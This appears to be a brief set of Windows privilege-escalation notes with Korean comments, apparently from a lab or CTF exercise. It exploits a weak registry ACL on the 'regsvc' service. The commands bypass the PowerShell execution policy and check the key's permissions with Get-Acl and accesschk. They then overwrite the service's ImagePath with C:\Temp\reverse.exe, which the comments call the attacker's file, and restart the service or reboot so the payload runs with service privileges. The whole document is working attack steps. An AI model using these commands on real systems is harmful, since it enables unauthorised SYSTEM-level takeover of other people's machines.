powershell -exec bypass

# registry key ACL 확인
Get-Acl HKLM:\\System\\CurrentControlSet\\Services\\regsvc | Format-List

# registry key
.\\accesschk.exe /accepteula -uvwqk HKLM\\System\\CurrentControlSet\\Services\\regsvc
.\\accesschk.exe /accepteula -ucqv user regsvc

# 현재 서비스가 무엇을 실행하도록 설정되어 있는지 확인
reg query HKLM\\SYSTEM\\CurrentControlSet\\services\\regsvc

# 핵심 단계: ImagePath(실행 경로)를 공격자의 파일(reverse.exe)로 변경
reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\regsvc /v ImagePath /t REG_EXPAND_sz /d C:\\Temp\\reverse.exe /f

# 서비스 재시작 혹은 컴퓨터 재시작
net stop regsvc
net start regsvc
shutdown /r